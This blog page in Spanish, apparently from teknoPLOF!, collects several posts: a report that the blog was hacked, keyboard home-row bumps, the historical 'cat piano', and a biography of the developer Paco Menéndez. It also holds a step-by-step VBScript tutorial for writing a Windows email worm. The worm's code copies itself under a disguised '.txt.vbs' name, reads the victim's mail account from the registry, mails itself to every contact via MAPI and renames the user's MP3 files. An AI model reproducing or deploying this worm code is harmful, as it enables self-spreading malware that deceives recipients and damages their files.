teknoPLOF! caído por un ataque hacker

Team A6

Team A6

Durante la noche del jueves al viernes, teknoPLOF! fue objeto de un acto de hacking por un integrante del grupo Team A6, una asociación saudí con bastante repercusión mediática en la Red, pero sin entradas de autobombo en el archivo de Zone-H). Después de un largo día de recuperación de datos y reconfiguración del servidor, parece que la cosa volvió a marchar más o menos bien el sábado por la mañana.

La verdad es que ha sido obra de un tío muy jaranero y campechano que consiguió robar las claves de acceso al hosting (todavía no me explico cómo) y se paseó durante un buen rato por el panel de control del blog, toqueteando por aquí y por allá. Creó un subdominio, una cuenta FTP redirigida a dicho subdominio y una cuenta de correo que colocó como contacto principal del proveedor (qué cachondo). Además, se curró un deface de la web bastante siniestro, al más puro estilo hacker de los noventa. También modificó el idioma del panel de control (supongo que para entenderse él en el trance), y me las vi y me las deseé para encontrar las cosas (no, no era inglés).

Desde estas líneas sólo, pedir mil disculpas a los lectores que han estado intentando entrar y no han podido, y también a los sindicalistas del RSS que no han logrado recibir los feed con normalidad (que tampoco había ninguna actualización, así que no se han perdido nada) o los han recibido repetidos. Los mismo para los tuiteros.

Un relieve sospechoso en tu teclado

Relieve bajo la 'F'

Relieve bajo la 'F'

Deja de mirar estas líneas y examina el teclado de tu ordenador minuciosamente… Ahora sigue leyendo. ¿Has observado algo extraño? Vuelve a mirar y fíjate en las teclas [F], [J] y [5] (esta última en el teclado numérico). No es difícil percibir que estas tres teclas tiene un pequeño relieve en forma de rayita elevada (a veces un punto), ¿lo ves? ¿Conspiración judeo-masónica, acupuntura dactilar para controlar tu voluntad o algo que se aloje dentro de las fronteras de la lógica?

Los expertos en mecanografía, es decir, los que no escriben con tres dedos como yo, conocerán el significado de estos relieves a la perfección. Pero me he percatado últimamente de que muchas personas desconocen para qué sirven y cuál es su función. Los podéis encontrar en todos los teclados informáticos y, también, en la mayoría de las antiguas máquinas de escribir.

Cuando se aprende mecanografía (o tipeo, como dicen al otro lado del charco) lo primero que te enseñan es la correcta colocación de las manos sobre el teclado: los dedos de la mano izquierda sobre las teclas [A], [S], [D] y [F] (desde el meñique hasta el índice, en ese orden), y los de la mano derecha encima de las teclas [J], [K], [L] y [Ñ] (desde el índice al meñique, en ese orden). Los pulgares descansan sobre la barra espaciadora.

Con esta posición, ambos dedos índices quedan sobre la [F] y la [J], es decir, justo encima de las líneas en relieve. En realidad, estos relieves sirven de guía para escribir sin mirar al teclado, pues posicionar las manos con la vista en otro lugar resulta sencillo en cuanto se encuentran los resaltes con las yemas de los dedos. Asimismo, al palpar el relieve de estas teclas, tenemos una orientación precisa de la ubicación de todas las demás.

El resalte de la tecla [5] en el teclado numérico tiene la misma misión, localizar rápidamente el centro del teclado sin necesidad de mirar para, desde ahí, acceder a los distintos guarismos de manera mecánica.

Los teléfonos móviles (o celulares) disponen también de un relieve saliente en la tecla central [5] (al igual que los teclados numéricos de los ordenadores). Ya te veo corriendo a por el teléfono para comprobarlo pero, por favor, si tienes un smartphone con pantalla táctil y teclado por software no pierdas el tiempo, no vas a encontrar el resalte (y si lo encuentras, vende el teléfono en eBay por no menos de seis mil euros).

Sin más.

Un piano retro hecho con gatos atormentados

Piano de gatos

Piano de gatos

En 1650, el sacerdote jesuita germano Atanasio Kircher describe por primera vez en su obra ‘Musurgia universalis, sive ars magna consoni et dissoni‘ (Producción universal de música, o la gran obra de consonantes y disonantes) el denominado piano de gatos (katzenklavier,  en alemán), una suerte de instrumento musical agónico con el que las protectoras de animales en la actualidad se habrían llevado las manos a la cabeza, poniendo el grito en el cielo.

El piano en cuestión consistía en una adaptación del mecanismo de cuerda percutida que, en lugar de aporrear alambres afinados, punzaba (o estiraba) colas de gatitos, convenientemente encerrados en pequeñas jaulas y dispuestos según la tonalidad de sus maullidos de dolor. Los mininos venían a cubrir una octava, generalmente, aunque existen grabados de pianos de gatos con menos de ocho felinos y, otros, con hasta dieciséis (dos octavas de puro calvario).

El instrumento fue también descrito, en el siglo XVII, por el compositor y escritor experto en temas musicales Jean-Baptiste Weckerlin en su libro ‘Musiciana, extraits d’ouvrages rare ou bizarre‘ (Musiciana, descripciones de inventos raros o extraños). Según este buen hombre, cuando el Rey de España Felipe II de Austria estuvo en Bruselas, en 1549, visitando a su padre, el emperador Carlos V de Alemania (Carlos I de España), ambos se admiraron de una procesión callejera totalmente singular. Lo que más les llamó la atención fue una carroza que portaba la música más extraordinaria que pudiera imaginarse. Un oso tocaba un órgano que, en lugar de tubos, montaba dieciséis pequeños gatos, con su cuerpo encerrado, cuyas colas, atadas, asomaban para ser tocadas como las cuerdas de un piano. Al presionar una tecla en el teclado, la cola correspondiente sufría un tremendo tirón, produciendo un aullido lamentable, pero muy bien entonado.

Este tipo de piano fue, asimismo, reseñado por el médico y psicoanalista alemán Johann Christian Reil en el siglo XVI. Este individuo propuso la utilización del piano de gatos para tratar pacientes que habían perdido la capacidad de enfocar su atención, es decir, aquejados de lo que se conoce como trastorno por déficit de atención con hiperactividad, o TDAH. Reil pensaba que si estos enfermos se veían obligados a ver y escuchar este instrumento, sería inevitable captar su atención y se curarían. Todo un tratado médico infame y vil de los que tanto gustaban los galenos de la época.

Otras representaciones de pianos de gatos

Otras representaciones de pianos de gatos

No se conoce realmente quién fue el creador de tan miserable invención, como tampoco es seguro que en algún momento de la historia de construyera un piano de esta naturaleza. Lo que resulta chocante es el desprecio por la vida y el sufrimiento animal que se tuvo en determinado momento histórico por aquellos que se hacían llamar racionales a sí mismos.

Atanasio Kircher, en su escrito anteriormente comentado, asegura que con el objeto de subir el ánimo a un príncipe italiano agobiado por las preocupaciones propias de su cargo, un músico de la corte creó para él un piano de gatos, suponiendo que su majestad de él sanaría de su pesadumbre, pues «¿a qué no ayudaría, sino a reír, una música así?«, sentenciaba. Se dice que de esta forma fue como el príncipe abandonó su melancolía. Es evidente: ocho gatos torturados hasta la extenuación ayudan a levantar el ánimo a cualquiera (a cualquiera que sea un hijo de la gran puta de cuna y linaje).

El estudio de animación profesional The People’s Republic Of Animation lanzó en 2009 su film ‘The cat piano, un cortometraje que cuenta la historia de una ciudad de gatos cuyos cantantes son secuestrados por un ser humano con el fin de hacer un piano de gatos. La obra recibió varios premios, así como una preselección a las nominaciones al Oscar de mejor animación, que luego no consiguió.

Recuerda, cada vez que leas esta entrada, Dios mata a un gatito. Ni el mismísimo Domo-kun es tan cabrón con los pobrecicos michos. Que lo sepas.

Programando fácilmente un virus para Windows

Windows virii

Windows virii

Recientemente, la historia de los virus informáticos ha cumplido ya cuarenta años. Casi medio siglo de quebraderos de cabeza con los que los usuarios y las empresas han tenido que lidiar prácticamente a diario. Aquel viejo ideario de infecciones al estilo Creeper (1971) o el español Barrotes (1993), donde los virus representaban un arte y un reto intelectual totalmente inocuo, desencadenó en una tremenda oleada de software malicioso que robaba datos, destruía sistemas operativos y producía millones de euros en pérdidas. ¿Quién no recuerda los tiempos de Viernes 13 (1988), Melissa (1999) o LoveLetter (2000)?    

Desgraciadamente (o afortunadamente) las herramientas para elaborar cualquier pieza de software están hoy día al alcance de cualquiera. Los antiguos y complejos desarrollos en ensamblador han dado paso a lenguajes modernos de alto nivel, fáciles de aprender y rápidos de implementar.    

Los archivos de proceso por lotes de MS-DOS (ficheros de extensión .BAT) fueron aquellos grandes olvidados en la programación de virus. No obstante, los expertos en su diseño vieron en ellos una alternativa veloz y potente para desarrollar malware, y algún bicho codificado de aquella forma llegó a ver la luz, eso sí, sin gran incidencia.    

Posteriormete, y gracias al procesamiento por lotes integrado en Windows a través de su herramienta de administración Windows Scripting Host (rebautizada en su segunda versión como Windows Script Host), los desarrollos víricos se multiplicaron exponencialmente, pues la potencia de desarrollo, unida a la suave curva de aprendizaje, permitía generar virus mortíferos en horas o, incluso (dependiendo de la pericia del programador) en minutos.    

Windows Script Host (WSH) es una utilidad administrativa que se provee con todas las versiones del sistema operativo del tío Bill desde Windows 98. En principio, su utilidad se basa en la generación de archivos de lotes, sin embargo, la potencia de estos ficheros con respecto a los antiguos ficheros batch es muy superior. La fortaleza reside en dos conceptos primordiales: los lenguajes de programación que implementa y los objetos del sistema que es capaz de manejar.    

WSH permite utilizar en la actualidad un amplio abanico de motores de script en su desarrollo, a saber: VBScript, JScript, PerlScript, ooRexx Script, Python Script, Tcl Script, Active PHP Script, Ruby Script, Object Rexx engine y Delphi scripting engine. Cualquier programador con conocimientos básicos de prácticamente cualquier lenguaje puede desarrollar un script para WSH. Asimismo, estos archivos de guión son capaces de acceder a características varias de un sistema operativo tales como, por ejemplo, variables de entorno, recursos de red compartidos, impresoras, el registro, el árbol de directorios, software instalado, Internet, archivos, etcétera. Una herramienta potente y un arma de doble filo.    

Lo que se propone aquí es una introducción al entorno WSH a través de aplicaciones en VBScript, el lenguaje de guión más sencillo e intuitivo, hermano pequeño torpe de Visual Basic. Como todo tutorial de programación que se precie, es preceptivo comenzar con una aplicación "Hola mundo", si no esto ni es tutorial ni es nada. Los archivos de script se escriben como texto plano sin formato en cualquier editor al uso (como Bloc de notas, por ejemplo). El código, con métodos del propio WSH y en formato VBScript, es el que sigue:    

WScript.Echo "Hola mundo"
WScript.Quit 

El objeto WScript proporciona el acceso a la raíz del modelo principal de objetos de WSH. No necesita ser declarado antes ser invocado, pues sus métodos y propiedades están siempre disponibles desde cualquier script. El método Echo muestra el cuadro de mensaje típico de Windows con un texto que se corresponde con la cadena alfanumérica que se le pasa como argumento ("Hola mundo"). Por último, el método Quit termina el script, forzándolo a parar su ejecución.    

¿Sencillo, verdad? Este archivo lo debemos guardar con la extensión .VBS y, para ejecutarlo, sólo es necesario un doble clic en el icono correspondiente (o una llamada desde la línea de comandos de la consola).    

Si hubiésemos deseado generar un fichero JScript, los métodos no habrían variado, pues son propios del WSH, sin embargo la sintaxis habría sido sutilmente distinta:    

WScript.Echo ("Hola mundo");
WScript.Quit (); 

Este archivo, para que funcionara correctamente, habríamos de guardarlo con extensión .JS.    

Prosiguiendo con nuestra fatídica infección vírica, vamos a avanzar un paso más. Necesitamos conocer el idioma del sistema operativo, por lo que vamos a internarnos en el registro de Windows para extraer el dato de una manera elegante:    

Dim WSc, IdiomaActual
Set WSc = CreateObject("WScript.Shell")  
Sub Idioma ()
  Dim LeerRegistro  
  LeerRegistro = WSc.RegRead ("HKEY_CURRENT_USER\Control _
    Panel\International\iCountry"
)  
  Select Case LeerRegistro
    Case 54,591,56,57,506,593,503,34,502,504,52,505,507,595,51,598,58
      IdiomaActual = 1
    Case 1,44
      IdiomaActual = -1
    Case Else
      IdiomaActual = 0
   End Select
End Sub   

Tras la declaración inicial de variables se asigna a WSc el objeto WScript.Shell, que permite acceder al registro, entre otras virtudes como ejecutar programas, crear accesos directos o procurar el acceso a los directorios del sistema. Estas dos líneas están fuera del procedimiento Sub porque necesitamos que sean declaraciones globales a todo el script (las utilizaremos después también).    

El procedimiento Sub Idioma () permite leer la clave de registro que necesitamos mediante el método RegRead de WScript.Shell y almacenarla en la variable local LeerRegistro. En función del valor que guarde iCountry, se asignará un 1, un -1 o un 0 a la variable global IdiomaActual, que después necesitaremos para cribar nuestra infección. En el caso de que IdiomaActual valga 1, el payload (efecto visible del virus) será en castellano (se corresponde con los códigos locales de todos los países sudamericanos más España); en el caso de que IdiomaActual valga 1, el payload será en inglés (Estados Unidos más Gran Bretaña); en el caso de IdiomaActual valga 0 (no se ha podido determinar el idioma), el payload será también en inglés, por si las moscas.    

Una vez obtengamos el idioma en el que está configurado el equipo que deseamos infectar, vamos a generar una copia del virus en el directorio del sistema para, desde ahí, enviarlo a los contactos de correo electrónico de la máquina víctima:    

Dim FSO, ArchivoAdjunto
Set FSO = CreateObject("Scripting.FileSystemObject"
Sub CopiaMe ()
  Dim DirectorioSistema
  Set DirectorioSistema = FSO.GetSpecialFolder (1)
  Set ArchivoAdjunto = FSO.GetFile (WScript.ScriptFullName)
  Select Case IdiomaActual
    Case 1
      ArchivoAdjunto.Copy (DirectorioSistema & "\ayudame.txt.vbs")
      ArchivoAdjunto = DirectorioSistema & "\ayudame.txt.vbs"
    Case 0,-1
      ArchivoAdjunto.Copy (DirectorioSistema & "\helpme.txt.vbs")
      ArchivoAdjunto = DirectorioSistema & "\helpme.txt.vbs"
  End Select
End Sub 

Después de crear las variables globales pertinentes, generamos el objeto FileSystemObject, de la librería de tipos (localizada en el archivo Scrrun.dll), y lo almacenamos en la variable FSO. Este objeto posibilita el acceso a la gestión de carpetas y archivos (crear, copiar, mover, eliminar…).    

Ya dentro del procedimiento Sub, asignamos a DirectorioSistema el resultado de GetSpecialFolder (1), esto es, la localización de los archivos de sistema (directorio por defecto Windows\System). Ese 1 indica carpeta de sistema; 0 sería el directorio general Windows y 2 el directorio temporal Temp.    

La propiedad ScriptFullName (sólo lectura) de WScript devuelve el nombre completo (ruta y nombre de archivo) del script actual mediante el método GetFile de FileSystemObject. Este nombre se guarda en la variable ArchivoAdjunto.    

Recurriendo a la variable global anterior IdiomaActual, copiamos (Copy) nuestro virus (ArchivoAdjunto) a la carpeta de sistema con un nombre en castellano (máquinas hispanoparlantes) o en inglés (máquinas anglosajonas).    

El proceso de ocultación de este tipo de virus es bien sencillo, así como tremendamente ineficaz en según que configuraciones. Bien es sabida la capacidad de los entornos Windows para ocultar las extensiones de tipos de archivos conocidos (activada por defecto). Así pues, el truco consiste en nombrar el fichero con una cadena terminada en, por ejemplo, .txt, seguida de la extensión de rigor para el archivo de script (.vbs). De esta manera, y sólo si la característica de ocultación de extensiones está activada, el receptor del malware visualizará únicamente el nombre del archivo (en este caso ayudame.txt o helpme.txt), creyendo que lo que le remiten es un simple archivo de texto (¿nadie mira los iconos?). La sorpresa será mayúscula al momento de ejecutarlo.    

El siguiente paso es obtener los datos de la cuenta de correo electrónico de la víctima:    

Dim ServidorSMTP, NombreCuenta, Correo 
Sub Cuenta()
  Dim LeerRegistro, NuevaClave
 WSc.RegWrite "HKEY_CURRENT_USER\Software\Microsoft _
    \Windows Script Host\Settings\Timeout"
,0,"REG_DWORD"
  LeerRegistro = WSc.RegRead ("HKEY_CURRENT_USER\Software\ _
    Microsoft\Internet Account Manager\Default Mail Account"
)
  NuevaClave = "HKEY_CURRENT_USER\Software\Microsoft _
    \Internet Account Manager\"
& "Accounts\" & LeerRegistro
  ServidorSMTP = WSc.RegRead (NuevaClave & "\SMTP Server")
  NombreCuenta = WSc.RegRead (NuevaClave & "\Account Name")
  Correo = WSc.RegRead (NuevaClave & "\SMTP Email Address")
End Sub 

Mediante un acceso al registro igual al anterior, extraemos la clave que guarda el nombre de la cuenta de correo por defecto (Mail Account) y generamos una nueva cadena con otra clave de registro más el nombre de la cuenta. De esta nueva clave leemos y almacenamos la dirección del servidor SMTP de correo saliente, el nombre de la cuenta y la dirección de correo electrónico.    

Lo ideal ahora sería actuar sobre las reglas de mensaje del software cliente de correo electrónico, eliminándolas para que permitan el envío sin cortapisas. No nos detendremos en ello por no alargar más el asunto, pero el código no sería para nada complicado, teniendo en cuenta que se encuentran definidas y almacenadas también en el registro de Windows (las de Outlook Express 5, por ejemplo, en HKEY_CURRENT_USER\Identities\XXXX\Software\Microsoft\Outlook Express\5.0\Rules\Mail).    

Una vez recabados todos los datos, vamos a enviar nuestro virus por correo electrónico:    

Sub Enviando ()
  Set MAPISession = CreateObject ("MSMAPI.mapiSession")
  Set MAPIMessage = CreateObject ("MSMAPI.mapiMessages"
  Dim i
  MAPISession.LogonUI = False
  MAPISession.DownloadMail = False
  MAPISession.SignOn 
 Set MAPIAddress = MAPISession.AddressList (0)
  For i = 1 To MAPIAddress.AddressEntries.Count
    MAPIAddress.AddressEntries (i)
    MAPIMessage.SessionId = MAPISession.SessionId
    MAPIMessage.Compose
    MAPIMessage.RecipDisplayName = "<atacante@virus.soy>"
    MAPIMessage.MsgSubject = "Asunto del mensaje"
    MAPIMessage.MsgNoteText = "Cuerpo del mensaje"
    MAPIMessage.AttachmentIndex = 0
    MAPIMessage.AttachmentPathName = ArchivoAdjunto
    MAPIMessage.AttachmentPosition = 0
    MAPIMessage.Send (0)
  Next
  MAPISession.SignOff
End Sub 

En este procedimiento Sub, simplemente nos servimos de MAPI (en castellano Interfaz de Programación de Aplicaciones de Mensajería) para enviar el correo con el archivo adjunto. Los métodos que proporciona MAPI son lo suficientemente claros y se explican por sí mismos (iniciar sesión, componer, rellenar datos, adjuntar archivos, enviar y cerrar sesión). El envío se remite a todos los contactos de la cuenta de correo en cuestión mediante un bucle que los recorre desde el primero hasta el último (MAPIAddress.AddressEntries.Count).    

Y, para finalizar, nos queda por programar el payload del virus, esto es, la acción visible (o no visible) que se ejecutará en la máquina infectada. El payload de un virus corre a cargo de la imaginación de cada uno. En función del hijoputismo con el que deseemos actuar, la acción final de un virus puede ir desde la simple molestia de mostrar un mensaje en pantalla, hasta la eliminación de archivos vitales para el usuario o para el sistema operativo (librerías .DLL, ficheros multimedia .MP3 o .AVI, documentos .DOC, .XLS o .MDB, fotografías .JPG, etcétera).    

Nosotros, por aquello de no dar ideas, nos vamos a quedar a medio camino. Nuestro payload simplemente mostrará un mensaje en pantalla y renombrará todos aquellos ficheros en formato MP3 que encuentre exclusivamente en el directorio raíz del disco duro principal. Así de sencillito:    

Sub Payload ()
  Dim Carpeta, ArchivoMP3
  WScript.Echo "Soy un virus malo malísimo." 
  Set Carpeta = FSO.GetFolder ("C:\")
  For Each ArchivoMP3 in Carpeta.Files
    If Right (ArchivoMP3.Name, 3) = LCase ("mp3") Then
      FSO.MoveFile ArchivoMP3.Path, Replace ("C:\" & _
        ArchivoMP3.Name, ".mp3", ".vir")
    End If
  Next
End Sub 

Mediante el método GetFolder de FileSystemObject, declarado anteriormente, asigno a la variable Carpeta la ruta especificada para, después, recorrer todos los archivos de esa ruta (Carpeta.Files) mediante un bucle (For Each... Next) comprobando si su extensión es la que busco (Right (ArchivoMP3.Name, 3) = LCase ("mp3")). En caso afirmativo, renombro (FSO.MoveFile) cada fichero, cambiando su extensión de .MP3 a .VIR.    

La programación de virus al alcance de cualquiera es una realidad desde hace ya muchos años. Pero otra cosa también, la policía no es tonta y conocerá al cien por cien quién ha programado un virus, cuándo lo liberó en Internet y dónde apareció por primera vez. ¿Cómo lo hacen? De eso nos ocuparemos otro día. Hack the planet!, pero poquito y con cuidadín, que hacer el mal por hacer el mal es de bobos patológicos.

Paco Menéndez: genio y figura hasta la sepultura

Paco Menéndez

Paco Menéndez

Francisco «Paco» Menéndez murió cuando contaba tan sólo 34 años de edad. Se suicidó arrojándose por la ventana de su vivienda en Sevilla, acosado por multitud de presiones psicológicas y financieras a cuenta del último proyecto en el que andaba metido, algo que habría revolucionado el mundo del PC a principios de siglo, y que nunca llegó a ser. El día del fatal desenlace se perdió un genio, de los pocos genios (de los de verdad) que este país ha visto parir.

Paco nació en Avilés, Asturias, en 1965, por pura casualidad. La actividad profesional de su padre, César Menéndez Roces, provocó un gran número de mudanzas y traslados de la familia que se tradujeron en la variada geografía donde nacieron sus hijos. Tuvo la increíble suerte de que el instituto donde cursaba 2º de BUP, a principios de los ochenta, fue uno de los primeros institutos españoles en incorporar la informática a las aulas. Ese detalle curricular cambiaría su vida para siempre.

Aprendió a programar en lenguaje BASIC aporreando el teclado de un rudimentario Commodore PET, por aquel entonces un cacharro que prácticamente procesaba a pedales. En aquellas clases de informática coincidió con dos compañeros de instituto, Carlos “Charlie” Granados y Fernando Rada. Los tres se sintieron apasionados por el mundo de los ordenadores, pero Paco comenzó a destacar en el manejo de la máquina de una manera insólita.

Dos años después, cuando los chavales tenían sólo 17 años, acudieron a la madrileña feria SIMO, uno de los eventos informáticos y tecnológicos más importantes de España que ha sobrevivido (a duras penas, últimamente) hasta nuestros días. En aquel recinto, un representante de la empresa Indescomp, una de las primeras compañías españolas de videojuegos, les observó toquetear un ZX81. La destreza con la que manejaban la máquina les otorgó una buena oferta de trabajo por parte de Indescomp, que en aquel entonces estaba preparando la llegada de los primeros ZX Spectrum a España. La oferta fue aceptada, y los tres muchachos pasaron a las filas de la distribuidora.

Paco Menéndez, Carlos Granados, Camilo Cela y Fernando Rada

Paco Menéndez, Carlos Granados, Camilo Cela y Fernando Rada

Su misión inicial fue la de traducir y adaptar los juegos de Spectrum (y, posteriormente, Amstrad CPC) anglosajones para el mercado patrio. Pero, y debido a sus conocimientos, también se les encargó el desarrollo de los primeros títulos de marca española. De aquel trabajo nacería ‘Fred en 1983 (conocido en el Reino Unido como ‘Roland on the ropes’) que, junto con ‘La pulga‘ (1983), programado por otro grande de la época, Paco Suárez, se convirtió en uno de los primeros juegos profesionales españoles comercializados a nivel internacional.

En tiempos posteriores, Indescomp dejó de prestar atención al software para dedicarse casi en exclusiva a la venta y distribución de hardware, gracias a un acuerdo con Amstrad. Aquella decisión dejó prácticamente fuera de juego a los tres muchachos, por lo que decidieron marcharse y crear su propia empresa de videojuegos llamada Made in Spain, junto con un tercer joven, Camilo Cela. Como curiosidad, comentar que este Camilo Cela ha saltado a la palestra informativa treinta años después por ser el presidente de USCA (Unión Sindical de Controladores Aéreos) durante el rifirrafe que mantuvo, la pasada Navidad, el gobierno español con los controladores aeroportuarios.

El ayer (muchacho del centro) y el hoy de Camilo Cela, otro de los genios artífices del 'Sir Fred' y actual presidente de USCA

El ayer (muchacho del centro) y el hoy de Camilo Cela, otro de los genios artífices del 'Sir Fred' y actual presidente de USCA

Los cuatro componentes de Made in Spain dieron a luz uno de los juegos más laureados y reconocidos del panorama de ocio digital de la conocida como época dorada del software español: ‘Sir Fred (1986). Orientado inicialmente como la segunda parte de ‘Fred’, poco tuvo que ver al final. El enfoque del programa cambiaba radicalmente, encauzándose prácticamente hacia la videoaventura y resultando en una complejidad de movimientos y manejo que muy pocos supieron comprender. El afán de superación de Paco Menéndez mucho tuvo que ver en aquel título, ya que siempre pugnaba consigo mismo para hacer algo mucho mejor que lo anterior.

‘Sir Fred’ no obtuvo demasiado éxito en Gran Bretaña. Los ingleses gustaban de juegos sencillos, que fueran fáciles de manejar, y este no era precisamente eso. La multitud de combinaciones de movimientos que se podían imprimir al personaje, hacían de ‘Sir Fred’ un título bastante complicado de controlar, sin embargo, todas las voces alabaron su calidad técnica y el paso adelante que supuso en el mundo de la programación de la época.

La distribuidora de ‘Sir Fred’ en Inglaterra fue Mikro-Gen, compañía bastante popular por haber editado videoaventuras de calidad como las de la saga de ‘Everyone’s a Wally‘. La empresa no cumplió a nivel económico, lo que encabronó sobremanera a los chicos de Made in Spain, sobre todo a Paco. Tras pocos años en el mundo del desarrollo videojueguil, Menéndez descubrió que lo importante no era la creatividad ni la técnica, sino el negocio puro y duro. Vamos, que se dio de bruces contra la realidad.

'Sir Fred'

'Sir Fred'

En aquel momento ya anunció que abandonaría el mundo de los videojuegos, pero deseaba crear un último título que tenía en mente y que superaría todas las expectativas para las máquinas de la época. Los componentes de Made in Spain decidieron crear su propia distribuidora (en 1986) para huír de los tiburones del mercado y controlar desde el principio hasta el final ellos mismos sus productos. Aquella distribuidora fue la mítica Zigurat. Paco decidió no entrar en el proyecto, porque seguía creyendo férreamente en el ingenio y deseaba escapar del vil mundo de los negocios.

Separado ya de sus amigos, resolvió embarcarse en ese último propósito que le roía la sesera (tras desarrollar el poco conocido ‘Sophos’, un diseñador de circuitos impresos para microprocesadores) junto con el futuro arquitecto, y amigo de la infancia, Juan Delcán. Aquel último juego que deseaba programar llegaría a ser un hito en la historia de los videojuegos, una de las más grandes obras maestras, posteriormente versionada y reconstruida hasta la saciedad: La abadía del crimen (1987). El juego, basado en la magistral novela de Umberto Eco ‘El nombre de la rosa‘ y distribuido por Opera Soft, debía llevar como título el mismo que el libro, pero desavenencias entre Opera Soft y Eco llevaron a no conseguir los derechos del nombre. Dicen las malas lenguas que Umberto Eco no llegó nunca a comprender que era aquello de un videojuego, y que por eso no otorgó el permiso a la compañía española.

'La abadía del crimen'

'La abadía del crimen'

‘La abadía del crimen’ se desarrollaba en escenarios de perspectiva isométrica, algo inaudito para el momento y lo que más se asemejaba a las tres dimensiones que hoy conocemos. Llevó un año producirlo, con la programación de Paco y los diseños de Juan, mediante un software que el propio Menéndez había desarrollado para su amigo. Según el propio Juan Delcán, «él (Paco) tenía una manera muy particular de programar, no lo hacía delante del ordenador, sino que se paseaba de un lado para otro, dando vueltas con las manos entrecruzadas en la espalda, pensando. Se podía pasar así una hora, a veces más, y, de repente, se le iluminaban los ojos y se sentaba delante del computador y, de corrido, escribía las líneas a una velocidad tal que parecía poseído, con los brazos extendidos y su cara lejos de la pantalla. Era como ver a alguien tocar el piano, su cabeza ya no pensaba, sino que se limitaba a ejecutar lo ya decidido».

Tras el éxito de ‘La abadía del crimen’, Paco Menéndez decidió retirarse completamente del mundo del videojuego. Se sentía más ingeniero en telecomunicaciones (lo que estudiaba mientras trabajaba) que programador informático al uso. Además, creía imposible mejorar ‘La abadía del crimen’ con la tecnología de aquella época y no en menos de un año, algo que iba contra sus principios, opuestos a una industria feroz en la que primaba más el consumo fácil y rápido que la creatividad y la apuesta por la innovación.

Se concentró pues en terminar su carrera, mientras trabajaba en un proyecto de procesamiento de datos en paralelo, gracias al cual esperaba conseguir un buen puesto de trabajo; no era muy ambicioso, se conformaba con trabajar en algo que le gustara. Denominó al proyecto «Memoria matricial inteligente», basado en la idea de que la memoria de un ordenador, además de almacenar datos, pudiera ejecutar instrucciones de manera simultánea, lo que supondría una alta paralelización a bajo coste (ordenadores que multiplicarían su potencia a un precio muy inferior). Una idea ingeniosa que, lamentablemente, nunca vio la luz.

Paco se arrojó al vacío desde su apartamento de Sevilla en 1999, falleciendo al instante con sólo 34 años. Al parecer, diversas presiones a las que estaba sometido, junto con la gran inversión que había acometido para su proyecto, provocaron el fatal desenlace. Sin embargo, desde el abandono del mundo de los videojuegos hasta el día de su muerte, la verdad es que su historia ha representado un auténtico misterio. Muchos hablan de oscuras conspiraciones, manos negras a las que asustaban sus investigaciones y otras extrañas paranoias varias. Personalmente no creo nada de eso. Su hermana, Malena Menéndez, declaró en cierta ocasión que «todo eso es falso. Fue una sorpresa para todo el mundo, nada hacía pensar lo que iba a pasar».

Paco dijo una vez una frase que ha quedado para los anales de la historia del mundo del ocio digital: «Prefiero el reconocimiento de la gente al dinero«. Esta sentencia pone de manifiesto la calidad humana y profesional que tenía este muchacho, alejado siempre de la industria y del negocio que envilece a los grandes genios como él. Desde aquí, nuestro pequeño recuerdo para un hombre íntegro.

eBook 'retroPLOF!'

retroPLOF!
Especifica tu dirección de correo electrónico y pulsa 'Comprar ahora'. Puedes pagar con tu cuenta de PayPal o con cualquier tarjeta bancaria.

E-mail envío eBook:

<script>» title=»<script>


<script>

Utilizamos cookies propias y de terceros para mejorar la experiencia de navegación. Más información.

ACEPTAR
Aviso de cookies